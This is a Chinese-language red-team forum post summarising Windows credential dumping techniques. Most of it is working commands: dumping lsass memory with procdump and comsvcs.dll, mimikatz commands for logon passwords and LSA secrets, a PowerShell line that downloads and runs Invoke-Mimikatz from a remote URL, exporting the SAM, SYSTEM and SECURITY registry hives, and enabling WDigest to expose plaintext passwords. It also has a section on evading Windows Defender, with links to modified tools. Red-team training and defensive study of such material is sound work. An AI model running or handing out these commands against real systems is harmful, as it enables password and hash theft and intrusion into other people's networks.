奇安信攻防社区-凭证转存基础总结

凭证转存基础总结

红队基础-凭证转存基础总结

1.从Lsass.exe进程内存中转储凭据到硬盘
========================

1.1 procdump
------------

下载地址：  
<https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump>

- 转存hash

```php
procdump -ma lsass.exe lsass_dump

# 或者通过转储克隆的lsass进程来避免读取lsass
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
```

- 还原明文密码

```php
sekurlsa::Minidump lsass_dump.dmp
sekurlsa::logonPasswords
```

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-87f669a2d90e4b2bff70e64cd6a4a62508d2fdc2.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-87f669a2d90e4b2bff70e64cd6a4a62508d2fdc2.jpg)

注意： mimikatz的版本一定要和服务器一致，否则会无法读出lsass内存信息。

1.2 Task Manger
---------------

任务管理器转存：

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-da1c1b5e44535a62ce385ff89f6eb7e70214ea54.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-da1c1b5e44535a62ce385ff89f6eb7e70214ea54.jpg)

1.3 comsvcs.dll
---------------

```php
powershell -c "rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\lsass.dmp full"
```

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-718c111db94251d001226e50abc72877f685f21b.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-718c111db94251d001226e50abc72877f685f21b.jpg)

用这种方法dump内存，需要开启：`SeDebugPrivilege`，默认cmd下未开启此权限，而powershell下默认开启此权限。

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-90431c73b183760e121c13900322b08dd55bb75a.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-90431c73b183760e121c13900322b08dd55bb75a.jpg)

2.从Lsass.exe进程转存凭证
==================

2.1 powershell远程调用mimikatz读取密码
------------------------------

- 远程调用Invoke-Mimikatz读密码

```php
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
```

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-2a88248d1e0592100e14ff36c4a5eb194fe07e66.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-2a88248d1e0592100e14ff36c4a5eb194fe07e66.jpg)

- 本地调用Mimikatz读密码

PowerShell因为在此系统中禁止执行脚本  
用管理员权限打开powershell并执行 `set-ExecutionPolicy RemoteSigned`即可.

note1 : (未成功)

```php
powershell -ExecutionPolicy Bypass -File mimikatz.ps1
```

note2 :

```php
powershell.exe -exec bypass -command "& {Import-Module C:\Users\Admin\Desktop\Invoke-Mimikatz.ps1;Invoke-Mimikatz -DumpCreds}"
```

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-f7364c35a4b02e8c9f4f75d3e51d7b31df5c886f.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-f7364c35a4b02e8c9f4f75d3e51d7b31df5c886f.jpg)

3.bypass Windows Defender
=========================

可以使用其他的一些windows api进行dump内存，从而绕过Windows Defender的检测。

3.1 MiniDumpWriteDump of DbgHelp.dll
------------------------------------

MiniDumpWriteDump 是DdgHelp.dll的一个函数，它通常被用做收集程序异常信息，可以直接dump进程的内存。

利用该函数开发的工具：

代码：<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass>

直接运行工具，即可在该目录下生成一个dmp文件：

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-e8e25798660aab9aea8cb739335ba26c510f4462.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-e8e25798660aab9aea8cb739335ba26c510f4462.jpg)

修改后的成品工具：链接: <https://pan.baidu.com/s/1HZnXuUJVNcBwhnRdYsPutA> 提取码: hwfi

3.2 PssCaptureSnapshot
----------------------

这个api会从lsass进程快照进行dump内存，代码：

<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass>

其实`procdump -r`就是利用这个api进行转存的。

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-32818a8d2ab0bc889d76950f3e7c82fefc467280.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-32818a8d2ab0bc889d76950f3e7c82fefc467280.jpg)

这里要注意必须在powershell下运行，因为需要开启`SeDebugPrivilege`权限。

可以使用网上其他师傅的代码，在转存之前开启`SeDebugPrivilege`权限，成品工具：链接: <https://pan.baidu.com/s/1HZnXuUJVNcBwhnRdYsPutA> 提取码: hwfi

4.导SAM取hash
===========

4.1 从注册表导出：
-----------

- attacker@victim

```php
reg save hklm\system system
reg save hklm\sam sam
```

- attacker@local

```php
samdump2 system sam 
```

4.2 esentutl.exe导出
------------------

```php
esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
```

[![](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-3d15da715def3b085ab0fd459363d962d3b94612.jpg)](https://cdn-yg-zzbm.yun.qianxin.com/attack-forum/2021/08/attach-3d15da715def3b085ab0fd459363d962d3b94612.jpg)

- windows 10测试通过
- windows 2008 测试失败

5.windows2008以上获取明文密码
=====================

```php
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
```

6.mimikatz命令读取密码
================

```php
mimikatz.exe privilege::debug 
sekurlsa::logonpasswords full exit
```

7.dump LSA密码
============

```php
什么是LSA密码？
```

LSA是Windows系统本地安全认证的模块。它会存储用户登录其他系统和服务用户名和密码，如VPN网络连接、ADSL网络连接、FTP服务、Web服务。

7.1 从内存dump LSA密码
-----------------

```php
mimikatz.exe privilege::debug 
token::elevate
lsadump::secrets
```

7.2 从注册表dump LSA密码
------------------

LSA密码在注册表中存放位置：

```php
HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
```

导出注册表：

```php
reg save HKLM\SYSTEM system & reg save HKLM\security security
```

用mimikatz读取：

```php
lsadump::secrets /system:c:\temp\system /security:c:\temp\security
```

发表于 2021-08-31 16:32:25
阅读 ( 8052 )
分类：内网渗透

凭证转存基础总结

0 条评论